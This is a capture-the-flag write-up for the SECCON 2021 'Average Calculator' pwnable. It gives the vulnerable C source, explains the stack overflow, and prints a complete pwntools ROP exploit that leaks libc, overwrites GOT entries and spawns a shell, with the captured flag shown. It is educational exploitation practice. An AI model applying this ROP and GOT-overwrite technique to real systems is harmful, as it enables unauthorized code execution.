# Average Calculator (pwnable, 56 teams solved) ###### tags: `SECCON CTF 2021` ## Overview This problem is a simple stack buffer overflow challenge but requires a bit of ingenuity. The binary calculates an average of input numbers. ``` $ ./average n: 5 A[0]: 1 A[1]: 2 A[2]: 3 A[3]: 4 A[4]: 5 Average = 3 ``` Source code: ```c= #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { long long n, i; long long A[16]; long long sum, average; alarm(60); setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("n: "); if (scanf("%lld", &n)!=1) exit(0); for (i=0; i<n; i++) { printf("A[%lld]: ", i); if (scanf("%lld", &A[i])!=1) exit(0); // prevent integer overflow in summation if (A[i]<-123456789LL || 123456789LL<A[i]) { printf("too large\n"); exit(0); } } sum = 0; for (i=0; i<n; i++) sum += A[i]; average = (sum+n/2)/n; printf("Average = %lld\n", average); } ``` ## Vulnerability The vulnerability of the binary is obvious. There is no boundary check when assigning input numbers to `A`. So, we can make stack buffer overflow. The only difference from regular stack buffer overflow challenges is that the range of values that can be written is restricted to between -123456789 (0xfffffffff8a432eb) and 123456789 (0x75bcd15). This range means that we can write an address of the binary (since compiled without PIE) but not libc's one. ## Solution Although leaking libc's addresses is not affected by the restriction, we cannot call `system("/bin/sh")` or one-gadget RCE by return oriented programming (ROP). Let us adopt [GOT overwrite](https://blog.pwntools.com/posts/got-overwrite/). Arbitrary 64-bit value can be written to arbitrary address of the binary by calling `scanf("%lld")` in ROP. By writing the address of `system` to GOT and calling the corresponding PLT, we can call `system`. Since variables `i` and `n` are located after `A`, we have to take care to keep their original value while overwriting. ```python= from pwn import * # pwntools elf = ELF("average") context.binary = elf s = remote("average.quals.seccon.jp", 1234) # Since pwn.ROP inserts large values, manually ROP :( pop_rsi_r15 = 0x4013a1 pop_rdi = 0x4013a3 nop = 0x4013a4 payload = ([0]*16 + [ 0, # n 0, # average 0, # sum 19, # i 0, # rbp # puts(puts) pop_rdi, elf.got.puts, elf.plt.puts, # scanf("%lld", alarm) pop_rdi, next(elf.search(b"%lld")), pop_rsi_r15, elf.got.alarm, 0, nop, elf.plt.__isoc99_scanf, # scanf("%lld", setvbuf) pop_rdi, next(elf.search(b"%lld")), pop_rsi_r15, elf.got.setvbuf, 0, elf.plt.__isoc99_scanf, # alarm(setvbuf) = system("/bin/sh") pop_rdi, elf.got.setvbuf, nop, elf.plt.alarm, ]) payload[16] = len(payload) # n s.sendlineafter(b"n: ", str(len(payload)).encode()) for p in payload: s.sendlineafter(b": ", str(p).encode()) s.readline() # Average = ??? puts = int.from_bytes(s.readline()[:-1], "little") libc = ELF("libc.so.6") libc.address = puts - libc.symbols.puts s.sendline(str(libc.symbols.system).encode()) s.sendline(str(unpack(b"/bin/sh\0")).encode()) s.interactive() ``` ``` $ python3 solver.py [*] '/seccon_2021/average/average' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to average.quals.seccon.jp on port 1234: Done [*] '/seccon_2021/average/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] Switching to interactive mode $ ls -al total 36 drwxr-xr-x 1 root average 4096 Dec 9 20:21 . drwxr-xr-x 1 root root 4096 Dec 9 20:21 .. -r-xr-x--- 1 root average 16944 Dec 9 20:20 average -r-xr-x--- 1 root average 37 Dec 9 20:20 average.sh -r--r----- 1 root average 68 Dec 9 20:20 flag.txt $ cat flag.txt SECCON{M4k3_My_4bi1i7i3s_4v3r4g3_in_7h3_N3x7_Lif3_cpwWz9jpoCmKYBvf} ``` `SECCON{M4k3_My_4bi1i7i3s_4v3r4g3_in_7h3_N3x7_Lif3_cpwWz9jpoCmKYBvf}` ## Appendix If you feel this challenge is too easy, try FullRELRO version. @moratorium08, a tester for this challenge, have solved even with FullRELRO enabled. You can get the FullRELRO version by: ``` $ gcc -Wl,-z,relro,-z,now -fno-stack-protector -no-pie -fcf-protection=none average.c -o average_fullrelro ```
Last changed by  
kusano
1018

Read more

constellations (reversing, 17 teams solved)

Overview As stated in the problem description, the given binary is a x64 ELF file written in Go(lang). The program starts printing the flag and slows down. $ ./constellations SECCON{N33d_m0r3_sp33d_vo6Rg The task is to speed it up. Solution

12/24/2021
qchecker (misc, 14 teams solved)

Overview eval$uate=%w(a=%(eval$uate=%w(#{$uate})*"");Bftjarzs=b=->a{a.split(?+).map{|b|b.to_i(36)}};c=b["awyiv4fjfkuu2pkv+awyiv4f v ut 71 6g 3j +a x c e5e4pxrogszr3+5i0o mfd5dm9xf9q7+axce5 e4khrz21ypr+5htqqi 9iasvmjri7+axcc76i 03zrn7gu7+cbt4 m8 xybr3cb27+1ge6 s n jex10w3si9+1k8vdb4 fzcys2yo0"];d,e,f, g,h,i=b["0+0+zeexa xq012eg+k2htkr1ola j6+3cbp5mnkzll t3 +2qpvamo605t7j " ] ;(j=eval(?A<<82<<7 1<<86)[0])&&d==0&& (e+=1;k=2**64;l=-> (a,b){(a-j.ord)*25 6.pow(b-2,b)%b }; f=l[f,k+13];g= l [ g, k+ 37];h=l[h,k+51];i= l[i,k+81];j==?}&&( d=e==32&&f+g+h +i ==0?2:1);a.sub ! (/"0.*?"/,'"0'+[d ,e ,f,g,h,i].map{|x|x .to_s(36)}*?+<<34) );srand(f);k=b["7a cw+jsjm+46d84" ]; l=d==2?7:6;m=[ ? #*(l*20)<<10]*11* "" ;l.times{|a|b=d==0 &&e!=0?rand(4):0;9 .times{|e|9.times{ |f|(c[k[d]/10* *a %10]>>(e*9+f)& 1

12/21/2021
s/&lt;script&gt;//gi (misc, 115 teams solved)

Overview Can you figure out why s/<script>//gi is insufficient for sanitizing? This can be bypassed with <scr<script>ipt>. Remove <script> (case insensitive) from the input until the input contains no <script>. In this problem, we are required to speed up collect sanitizing since the size of flag.txt is 64 MiB. Bad approach

12/20/2021
Vulnerabilities (web, 94 teams solved)

Overview This application shows the logo and the URL of the past named vulnerabilities. There is an endpoint /api/vulnerability. $ curl -d '{"Name": "Heartbleed"}' https://vulnerabilities.quals.seccon.jp/api/vulnerability {"Logo":"/images/heartbleed.png","URL":"https://heartbleed.com/"} Source code:

12/20/2021
Read more from kusano
Published on HackMD